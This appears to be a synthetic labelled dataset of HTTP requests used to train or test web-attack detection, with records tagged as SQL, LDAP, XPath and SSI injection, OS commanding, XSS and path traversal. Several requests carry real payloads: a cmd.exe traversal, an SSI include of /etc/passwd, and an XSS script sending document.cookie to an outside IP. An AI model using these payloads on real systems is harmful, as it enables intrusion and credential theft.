UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: 3.3 149.30.70.113:78675, 8.6 73.154.175.194
Transfer-Encoding: gzip
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 729426151535484
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39289
Start - Id: 39078
class: LdapInjection
PUT /A1Mhtpass-Aor1qincludevF/fmiodxia7lrl/9GEzjRiX4r82/p1yzTSa6rmfgFdsqteth/g2naiFa/OservicesWo2M@Ae46U.png? HTTP/1.1
Content-Length: 221
Content-Language: ewbDm2br,tNria,rhia
Content-Encoding: compress
Content-Location: /dsEd/aub1i/erDBe8n/eein/iAsf.jsp
Content-MD5: b3pycTByYXlic3l6dW5yYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Feb 09 09:28:30 CET
Last-Modified: Mon, 16 May 05 21:23:17 GMT
Host: www.vteb.st:30
Connection: close
Accept: text/*, text/*;q=0.1, audio/basic;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: S6i-acp, 92Ihdrg-lhlo;q=0.3, low-Omnhi;q=0.2
Cache-Control: no-store
Client-ip: 153.235.216.16
Cookie: oiosaojoamnmo=")(targetfilter=(o=NetscapeRoot));d0ovecelrrgREim=9492;hEt6u=oi+6Drxhttpsgechottd
Cookie2: $Version="700"
Date: Thu, 11 Mar 04 08:44:28 GMT
ETag: "lEeDkIJP4MHmzYtVK"
Expect: 100-continue
From: d5netn@roY9j.cz
If-Modified-Since: Tue, 22 Jul 08 12:09:56 GMT
If-Unmodified-Since: Mon, 19 Oct 09 11:36:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8333
MIME-Version: 9.6
Pragma: no-cache
Authorization: tedt Jwrg=EfT8
Referer: /aKwtesgd/mittdT0/hCnteSew/nibieeee/yCearu.gif
TE: trailers
User-Agent: Mozilla/8.3 (X11; U; Open BSD i386 2.1; e3-yu; rv:5.1.5) Gecko/15269759
UA-Color: color16
UA-Pixels: 9422x4154
Via: 3.7 8.71.118.238, 3.5 www.Hlteea.gif:19
Transfer-Encoding: gzip
Upgrade: rishh/8.4, OnisdI/5.4, Tcuko/3.4, opdaet/0.0
Warning: 186 84.167.55.88 "yOnBOtb" 
X-Forwarded-For: 166.4.119.101
X-Serial-Number: 89933441893
----: -----------------------------------
~~~~~: ~~~~~~~~~~

2i=875&lod0Sr5o7nnpe=tolIaZqvQaw&fyhlepfa=0&iNl=iYLK1biL&XawreiesmAtnfad=er4nrEPb&xlosdiToP=0l3s&asO7aCg=wadcWTa-pHpl&qqChpsWMkb3=7&8aerajdsz=moe7nssaloti&snT9toTo=qz%trUqurep5&wt=07404886&icjuv4lgiethi=4aaGjr5d3oerdown

End - Id: 39078
Start - Id: 42141
class: SqlInjection
GET /cIrhTh/NBf/tjhritbpennTpfasb/TcEihtpassLOTdn7jsgroup by/pp7FXTPT0/ft4odndnl/oWMOT/dj.L9PD7Z91/ovwBidIep3j5el/eK9-.jpg?ss3noMthe=hOr0kDywiEiE&TR6imglhomeo1=Eaee8lLronlahyle5&oo7sealdyjj=503&iea0pnimo=thtnttddo&enhaief=s&wmo9oe1tdnts=o&eessethLh=%27+AND+++++USER_NAME%28%29%3D%27tEoo&ptDaaaioinoir=7ee%3F&ie7uhbrgrca=eacopy6m&Erz=riyeipuiE%5Ctos&joaidtmc=h HTTP/1.0
Host: 114.69.118.214
Connection: close
Accept: video/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, compress;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 117.221.83.105
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="5"
Date: Fri, 06 Jan 06 18:39:53 UTC
ETag: "Y-kpqEtfEwcQg2fs"
Expect: lvwu=Oe0m;eyxsous=diee
From: yaieolw@dAieet.st
If-Modified-Since: Tue, 06 Apr 10 20:31:51 GMT
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "gXtmJ1o3QKiR1Y7fdl"
If-None-Match: "uj5412N6l4Svhfsos"
If-Range: Mon, 30 Mar 09 03:11:01 UTC
Max-Forwards: 9
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: NTLM dm9yNHRwZWJuQVlhdW9kYTFuaXV0M3NlU2lpRXRBaWU=
Range: 80-3804,023297-91,09-
Referer: /noiakq/uFoesna.tiff
TE: trailers
Trailer: Connection
User-Agent: Mozilla/1.2 (X11; U; Linux i586 5.9; dE-ab; rv:6.0.5) Gecko/65333664
UA-CPU: StrongARM
UA-Disp: 988,870,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: 9.6 www.eXohnss.tiff:2746, 4.6 64.121.145.149
Transfer-Encoding: deflate
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42141
Start - Id: 44200
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.sEenoIer.fr:80
Connection: keep-alive
Accept: audio/basic;q=0.0
Accept-Charset: x-mac-hebrew;q=0.4, x-mac-greek;q=0.4, x-mac-arabic, cp-950;q=0.3, iso-8859-3;q=0.1
Accept-Encoding: gzip, gzip;q=0.4
Accept-Language: geU-ee, tzn-iteg;q=0.8, ihstctr-h;q=0.4
Cache-Control: no-transform
Client-ip: 56.183.96.43
Cookie: iWchlddpne7sn=mvod8vnwee;r@eVYwinnt%uiE=52358
Cookie2: $Version="1"
Date: Sat, 02 Jul 05 08:15:05 GMT
ETag: "GJ.WMW9KP4T-6JR1LW"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Tue, 09 Mar 10 14:19:14 CET
If-Unmodified-Since: Wed, 15 Aug 07 14:28:38 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Apr 10 04:27:39 CET
Max-Forwards: 8
MIME-Version: 1.5
Pragma: n='kusw'
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: deDe noqS=nc7seio
Range: 22399-
Referer: /Nlmsn.mspx
TE: chunked,gzip;q=0.9
Trailer: Referer
User-Agent: Mozilla/9.0 (Windows; U; WinNT 1.4; xS-7d; rv:9.2.0) Gecko/59053236
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: identity
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44200
Start - Id: 48938
class: XPathInjection
GET /tT/8@d9phpTKgI@adminwR8/lO/iQ/cbNDu.htm?nu3itrodyw0Irxo=hpiris%27++or+++emZa%2Fryg%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D+++++or++%270eib%27+++%3D+%27&so9tptiy7sFs=psItiframes%3Astdin9r%26tirp%5Bpxrud&Nirest=ttmpakmetaopt-%3BreroOdropprme&u4Rateoeohoi4a=numAssmt&aha=seew1Asen&k3eahl=a3nkJ5X_r&msfNseporedhAl=qlx&cu=tuN2pt0rN&5rseieamncothC=290702&qy6dhlnanBUht=nxsJ07J1rEB&lcmdKPLUO7j-6=inserteP-ejgrtadminn+luiop&mbwVREitrys=ks%244ahttptmpmalib HTTP/1.0
Host: www.esnhDPasch.st
Connection: twti
Accept: application/zip, text/html;q=0.9, video/quicktime;q=0.6
Accept-Charset: x-mac-ce;q=0.8, iso-8859-5, x-mac-roman;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 163.68.137.81
Cookie: ruAiceo=k3syo
Cookie2: $Version="549"
Date: Sun, 07 Mar 10 01:12:00 UTC
ETag: "Wnu8c7V6mR2JtbrB"
Expect: ghd27=dnsedlo;desEue
From: 11ria@soa2e.be
If-Modified-Since: Sat, 20 Mar 04 08:12:22 GMT
If-Unmodified-Since: Fri, 17 Nov 06 16:47:38 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 08:38:24 UTC
Max-Forwards: 340
MIME-Version: 5.2
Pragma: d='todogc'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Basic dDhhZms6ZWU0aTl0
Range: 326-470558,-0121
Referer: http://enpe.org/Otshw4w/rev2.wav
TE: trailers
Trailer: Proxy-Authorization
User-Agent: iyg4tswh
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/3.7 www.ftrdetb.gif, FTP/2.3 71.122.154.30, 2.5 www.raolifss.js
Transfer-Encoding: compress
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 129 www.iLdnews.tiff:319 "mv1aiMea" "Wed, 18 Oct 06 24:35:06 CET"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 6293000915488
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48938
Start - Id: 39593
class: SSI
GET /tbuayw9Oc3aaaTWe/8rstnehi2t/pQmX9xWdYWzlcC.css?hs=to&esdqadstwlti=9245589784&ehHeihihbnoEap=wIN4N1Vcg&aexo=195074&sayllfnzau2isee=e&sy5e6npbaaswsg=oTt0&aEbbsmoyXara3Ae=ob3r.2ZiJ&30eKXMFg2IC=ca5dmmrTedaeed&ZL259U2=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&XjMaEmailFIT=divat&o3eeksqc=Olcaeeanrrwst9&4hmtmhetirn=el3 HTTP/1.1
Host: www.esnd.it:80
Connection: keep-alive
Accept: text/plain
Accept-Charset: x-mac-greek;q=0.4, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: 1ucii-3eiol, exxd-b8ko7jh1, adIoe-dnsRnV;q=0.4
Cache-Control: only-if-cached
Client-ip: 239.19.170.214
Cookie: dovdoiht8Ee=fSriAntb3rdee;oes6ur=ople61;tiSe=)as;evMpnepkrP=413eetenithrbast;ainri7ti8op7e=mwhere
Cookie2: $Version="7"
Date: Mon, 07 Mar 05 22:10:42 CET
ETag: "QPI4Dj3kL@568.RaYHgi"
Expect: etree
From: k4wcg@aEdi7a2.de
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Sat, 17 Oct 09 15:42:24 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 07 Jul 08 01:52:09 UTC
Max-Forwards: 14
MIME-Version: 2.2
Pragma: eeh='eInew'
Proxy-Authorization: NTLM c3B4Yml0cGFpaWk0YmVscWVpU2h0ZWRybGE3ZWluc3NlamlqbjZkb2Nq
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: http://tiihntp.biz/E15us1ii/wrmo9q.jpg
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: 7lfNsio (i-3gqz; yww9FYOudR; dzRTzk0K)
UA-Disp: 7073,179,8
UA-OS: Win98
Via: eltSs/2.3 48.123.178.187, 4.0 148.252.199.132
Transfer-Encoding: compress
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 693 www.esm2no.shtml:36 "eEi40rmtp" "Sun, 28 Feb 10 20:28:26 CET"
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39593
Start - Id: 40867
class: SSI
GET /fiTEZ9tKoWh/Ar6uah.msf?Uezc8a=%3C%21--++%23odbc+statement+++%3D%22select+++sdjn%2C+++++iFfc%2C++Jeuj++from+tt7Tdknukd+++++order++++by+++6%2C+++23%2C++2%22+++--%3E HTTP/1.0
Host: 117.154.250.146
Connection: eeGolwn
Accept: text/*, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 175.185.183.88
Cookie: Pf9vHTand=atttb;tZaloNnok0=37175236;a0E1liah1t=rIHH;hbChaRrgDdheesi=oKr9OFN;SwinntkW2lXg=0317739
Cookie2: $Version="93"
Date: Thu, 16 Jun 05 02:59:13 UTC
ETag: "sKr@_Vwhn_E5hW1u"
Expect: 100-continue
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 08 Apr 04 17:47:58 GMT
If-Unmodified-Since: Tue, 13 Jan 04 04:24:22 UTC
If-Match: *
If-None-Match: "UG7kmIY9R5TH53PVf"
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 4
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: dNre ae1tadjl=gqbi
Authorization: NTLM c2Fvd3JwZGZjc2J4SXNzZGF4MWhyM2J0blR0cGRpOWV6eA==
Range: -375,-4
Referer: /unceAd/fnzls.pdf
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.1 (compatible; MSIE 9.9; Unix; tgiu)
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.4 161.243.89.169:47, 2.9 www.nedo7.tiff, 5.8 www.ieiEl6e.css
Transfer-Encoding: gzip
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40867
Start - Id: 35094
class: SqlInjection
GET /eboxtipea8tkcAnhob/nboot.inis9N_n3g/lR.aPLiaFyJ.gdR-QA/yP/rugTspzw/ttethrtcapeeuil.asp?de3xahoiEs=35&catadrTcns=5ero HTTP/1.1
Host: 203.253.193.147
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-4;q=0.0, cp-936;q=0.4, utf-7;q=0.0, ks_c_5601-1987, iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: e-r0a5r, erho6-dtt7htns
Cache-Control: only-if-cached
Cookie: FAxDsgtu8='     + (     SELECT  TOP   1    etIe   FROM   c7mrbi)    + '
Cookie2: $Version="8"
Date: Sun, 13 Feb 05 22:54:39 GMT
If-Modified-Since: Sat, 14 Mar 09 10:38:09 GMT
If-Unmodified-Since: Fri, 21 Dec 07 17:55:08 CET
If-None-Match: *
If-Range: *
Max-Forwards: 0341
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest qop=sisnfT
Authorization: Basic dXNoMWw6bjBsZXIw
Referer: /oyorgN/1eibsoly.nsf
User-Agent: eeiihsaprerbaeerneP
UA-Pixels: 712x637
Via: HTTP/9.0 225.212.89.177
Transfer-Encoding: deflate

null

End - Id: 35094
Start - Id: 37072
class: LdapInjection
GET /roiNty8k0X-2/u8IrGhA5ktqQ2/aru9h5yiiewaOz/2ir/o4tIhWeRyBint8ead/nrj/te/nJ8-V3qv92itaPMoz/iuTi.tiff?arnWtye=dbee%29%28%26%28objectClass++++%3DIiad*%29&naasj=oob%26d&nE5stwnesrssae=6677 HTTP/1.0
Host: 8.246.228.253:3234
Connection: heni
Accept: audio/*, video/*, video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, compress;q=0.8, deflate;q=0.5, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 172.225.76.42
Cookie: leesi4i3=3
Cookie2: $Version="67"
Date: Tue, 06 Mar 07 16:25:53 UTC
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: 100-continue
From: eyLj@5eswrLbN.net
If-Modified-Since: Tue, 11 Mar 08 06:35:45 UTC
If-Unmodified-Since: Mon, 22 Mar 04 05:04:41 GMT
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Wed, 28 Apr 10 10:40:31 GMT
Max-Forwards: 18
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM YzBOYW9pYTJpZW1IYWxtb3NXNXNpTThhdGxvb2xyZURudGVpZWV3cHNleGVub3Q=
Authorization: Digest opaque="ihsuh"
Range: -61152
Referer: /12ahecs/hl7a/iugw/Wgdooyt.rar
TE: chunked;q=0.2,deflate,gzip;q=0.3
Trailer: Upgrade
User-Agent: lEr7oedt/1.2.0.1.5
UA-CPU: PowerPC
UA-Disp: 538,106,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1905x9959
Via: uaocm/0.7 www.3aece.jpeg, 2.2 194.247.72.38
Transfer-Encoding: identity
Upgrade: dtya/1.7, sefv5/5.8, i5Baoo/5.8
Warning: 233 127.78.233.52 "baru8" "Tue, 09 Mar 04 09:31:50 CET"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 733012895588
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37072
Start - Id: 49757
class: XPathInjection
GET /rOafliivubuf/eisoo3wrwsHdtlt/uWHKpassthruNNTu/vFyYEETeYH/xwndBk8fanMrC9Oyp/thlmpe/l9eqkoseSUtl3i/nCtdktci.js?iesTagM2o=ft%27++++or+++ahl%2Fnmr4%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D999%5D++or+++%27tyc3ioac%27+++%3D+++%27 HTTP/1.0
Host: 147.130.161.62
Connection: keep-alive
Accept: video/mpeg;q=0.3, image/gif, audio/x-wav;q=0.1
Accept-Charset: shift_jis;q=0.8, koi8;q=0.4
Accept-Encoding: *
Accept-Language: ne-Yof;q=0.7
Cache-Control: max-stale=646
Client-ip: 149.198.73.153
Cookie: trsHld5ctCion=nodeiE\;mk=i2vintloNhrsr;du=6
Cookie2: $Version="46"
Date: Thu, 13 Dec 07 17:28:44 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: t8nua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Wed, 09 Aug 06 21:32:23 GMT
If-Unmodified-Since: Fri, 03 Dec 04 15:36:52 UTC
If-Match: "KDRaK2RxcLF0ECBI"
If-None-Match: "YPZXrM-LAwMFrNkV"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 8888
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM c2dlZ2VvbG9pTmZla25DRmV0ZWVoMDBvZXRhbGFteER0Nzdud0U=
Range: 75-,6326-9694,9570-
Referer: http://ai2N6.uk/eDIafl/pairf.dll
TE: trailers
Trailer: Cache-Control
User-Agent: q@8AS@A.S http://www.h8rd.cz
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: FTP/0.1 45.62.247.172
Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 925 www.tgat.css "onzuY" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49757
Start - Id: 37044
class: LdapInjection
GET /ttek2smst7IaL/0gC1PRE/tJwHsK/LvJV1O/42HbwRfgKfj2H8/amdelete9httpx/cftrrlbzorkga7y/uYWrh1fL3zRLc.mdb?eemsd=8e&eJi4aiit8t=9eiautoexechdtr%3AsE9h2C&QKnm1zx4=%24cypasswd&eh=fed+&teRCnpntgt=exmllo&iynribbrntt=527&An=T%27Ate7aexTds52i&etar=b6er%3ATeaallC&ykete=bcj%29%28+%7C++++%28N3l%3D*%29&FJen@sJG=51&FyhAaeaecofarhA=45910&8tLer=853879 HTTP/1.1
Host: www.Ttret.st:80
Connection: keep-alive
Accept: application/rtf;q=0.6, application/postscript;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 188.212.178.172
Cookie: 6roossd=52482
Cookie2: $Version="4"
Date: Mon, 08 Jan 07 11:45:41 UTC
ETag: "Dpb8_1olE.nLz3YRQbPu"
Expect: kodtt
From: tJpe@htd4aess.biz
If-Modified-Since: Tue, 05 Oct 04 14:04:18 UTC
If-Unmodified-Since: Mon, 05 Sep 05 10:55:01 CET
If-Match: *
If-None-Match: "jfyHLU6IO4Nk2Rqe"
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 319
MIME-Version: 3.6
Pragma: ac='szbrArde'
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic ZHR0THRsOnIxeTNlcg==
Range: -742236,5-8909,-634
Referer: http://www.famkt.ch/hsS9.png
TE: chunked,deflate
Trailer: Date
User-Agent: tt8Tia0
UA-CPU: 68000
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 2.1 201.140.223.201:942
Transfer-Encoding: gzip
Upgrade: nopuat/4.5
Warning: 055 85.124.104.165 "iraNbtdtn5hudtyn" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37044
Start - Id: 47734
class: XSS
GET /lOJBsnPJIE@Q-YvMd6pT.tiff?sy6tKikte=eyDGiy&tThetdldIes=32661&tn@htaccesV38Ivit=Aer&iTninlerR=Stdiea+3t%28ln%3Fe+bin&KM8OWf1KMix9=z6ATDfaoUYD0&AsjmtCN2r=%3Cxml+++id+%3D%22++++X++%22+%3E%3Ca++++%3E%3Cb+++%3E%26lt%3Bscript%3E%5Bwindow.open%28%27http%3A%2F%2F84.105.208.178%2Fon.php%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb++%3E%3C%2Fa+%3E%3C%2Fxml+++%3E HTTP/1.1
Host: 15.20.155.138:23
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 200.103.37.162
Cookie: ewai=opunbhm;oyHrthedI=mn'ialn0emsds1;eYi3=nepOSlQw;cysilMrocgt00=naSTjk
Cookie2: $Version="054"
Date: Sat, 24 Apr 04 20:31:13 UTC
ETag: "5T3Rz7Rc1UrCuOe2gb"
Expect: 100-continue
From: rlNe@ecetad6.fr
If-Modified-Since: Tue, 27 Apr 10 12:29:21 UTC
If-Unmodified-Since: Fri, 20 Aug 04 18:14:39 UTC
If-Match: "gRSWTVcGBjnhRXC8X"
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest uri=http://spfa.biz/mzembeOq/usguCen/etlmac.exe
Range: 9-,057-2,501963-763
Referer: http://www.Zlnb3d.org/meca.html
TE: chunked
Trailer: Date
User-Agent: Mozilla/9.6 (compatible; srhu0V; Solaris; wus6rOaU)
UA-CPU: PowerPC
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 2.8 9.132.188.193:3, FTP/1.7 140.100.115.49
Transfer-Encoding: gzip
Upgrade: 1eEw/6.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 147.116.190.16
X-Serial-Number: 399335844567
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47734
Start - Id: 41313
class: SqlInjection
GET /ooYn/NUAJQTGNKAmz.php4? HTTP/1.1
Host: www.6srddoef.cz
Connection: close
Accept: image/png;q=0.9
Accept-Charset: windows-1253
Accept-Encoding: 
Accept-Language: etytn-Sttogy;q=0.9, xe-fe4rkret;q=0.3, rt6iX-Sideltyf
Cache-Control: only-if-cached
Client-ip: 75.21.228.203
Cookie: O25libNFvtqT=' OR  'edta'   =    N'    ;c17eys0nfCur03=sreioaNsaw;r6alskne=nlaaeH
Cookie2: $Version="830"
Date: Wed, 17 Dec 08 23:23:30 CET
ETag: W/"Ik9CeFFgt5u2AcRFM"
Expect: 100-continue
From: ueaeFah@isedattkdk.be
If-Modified-Since: Sat, 25 Nov 06 21:35:37 CET
If-Unmodified-Since: Tue, 08 Jun 04 18:11:49 CET
If-Match: "phNdOK6XvC.xxXVAXY"
If-None-Match: "JL3AbqFeCvdXD4_V-5"
If-Range: "R6GZx1XxrdBCWcbOE0T"
Max-Forwards: 2
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest response="6194CAa6Ca7a4F3B82eAe24071229C1F"
Authorization: NTLM dHJhYWdocmFuaHhqbEE0UmF4dGNSMjVkckdlck50aGllaA==
Range: 3-1402,-33161,6-385
Referer: http://www.2hlde.it/enOa/detnnn/lfeRin/eawip.gif
TE: trailers,deflate,gzip;q=0.0
User-Agent: ctao/4.7.3
UA-CPU: 68000
UA-Disp: 925,428,8
UA-Color: color16
UA-Pixels: 187x5335
Via: FTP/3.7 www.hgtp.tiff
Transfer-Encoding: Ihee; setr8=aw0Np
Upgrade: nncle/5.7, nIrl/7.7
Warning: 506 www.ahaarsa.jpg "smnu" 
X-Forwarded-For: 139.28.183.159
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41313
Start - Id: 36922
class: LdapInjection
PUT /vo7znoesqlaassi26/6nt/bZQr.1REo.0ItPE6orQ/bqfIwBbHgAE1X/qinel8tpNw/eed5nezdl/nnNYrInn0Fg2cWOk/zyNuHRsowUl5dqA/eQg/3q/osniyeifk1tp/nyit.msf? HTTP/1.1
Content-Length: 287
Content-Language: p
Content-Encoding: compress
Content-Location: /rdrr/xbOttg/Aere5ewd/arsi.jpg
Content-MD5: eGRzYWhyYW4xeWlsYzQ5RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 03:05:51 UTC
Last-Modified: Sat, 14 Aug 04 21:52:25 CET
Host: 198.189.17.247
Connection: close
Accept: video/*;q=0.7, video/mpeg, image/png
Accept-Charset: big5, shift_jis;q=0.3, iso-2022-jp;q=0.1, cp-932;q=0.9, hz-gb-2312;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: a='Dii'
Client-ip: 23.24.154.22
Cookie: demOoomh=h@bEREJD;eeh2c=93;QrBnys=crrphap~&is;ha0duria67i=O4aeformAr;toErAefla=[r2uiuit
Cookie2: $Version="09"
Date: Sun, 03 Aug 08 13:40:49 GMT
ETag: W/"d7Bmeqt30DrvtRfk"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 01 Dec 06 22:26:15 CET
If-Unmodified-Since: Fri, 17 Nov 06 08:17:43 GMT
If-Match: "JmGR8_KOgVWzywY"
If-None-Match: "DU4x.HM2gYYPDUH2eZbK"
If-Range: Fri, 14 Mar 08 10:30:46 GMT
Max-Forwards: 1144
MIME-Version: 5.9
Pragma: OecrGjt=kae9ne
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Basic bmtzZTppc05scm5haQ==
Range: 03-
Referer: /kefap/6ethsa/eY4w/oiiyv.cfm
TE: chunked,chunked;q=0.4,trailers
Trailer: Accept
User-Agent: Mozilla/7.9 (Windows; U; WinNT 3.7; om-du; rv:2.0.6) Gecko/96534611
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Pixels: 015x0585
Via: 3.0 128.168.94.165, FTP/6.3 138.250.39.41
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 591 www.lalfoh.gif "ed6niocL" "Fri, 23 Feb 07 23:24:32 CET"
X-Forwarded-For: 189.182.231.41
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ieoSadswu6fynt=Oelfc&P6F8=1tdB&ahmoka4a8=")(targetfilter=(o=NetscapeRoot))&eEnnTy=rei&DzxejEDW4CXn=o|&cyieatce3aE=1i8ytxfhliaiTOpGa&vrvevRleTr=jbun46(&aae=120026248&bgsoundu9bI7au=173546&ea2fmohhbyg=016798505&T9lilE9t7=hv&Pe2PFmt=qojqQyc4&sohrl=fotf&1iuo1oq=eRvlIkJKm

End - Id: 36922
Start - Id: 45998
class: PathTransversal
PUT /oXG65.dCtKX-x5@/I6EN/kenuzcsrsbu2/VQ4M.cgi? HTTP/1.1
Content-Length: 183
Content-Language: 18nkt,tebeet
Content-Encoding: gzip
Content-Location: http://www.zXu4nyl.uk/nEywraLt/gePwre.js
Content-MD5: dnVpc2xlZW5hYWV0bWlycg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Sep 06 06:14:23 GMT
Last-Modified: Sat, 24 Apr 10 16:50:22 UTC
Host: www.ELtEewa.gov:4
Connection: close
Accept: video/*;q=0.6, application/postscript;q=0.3, application/zip;q=0.0
Accept-Charset: koi8;q=0.6, utf-7
Accept-Encoding: *
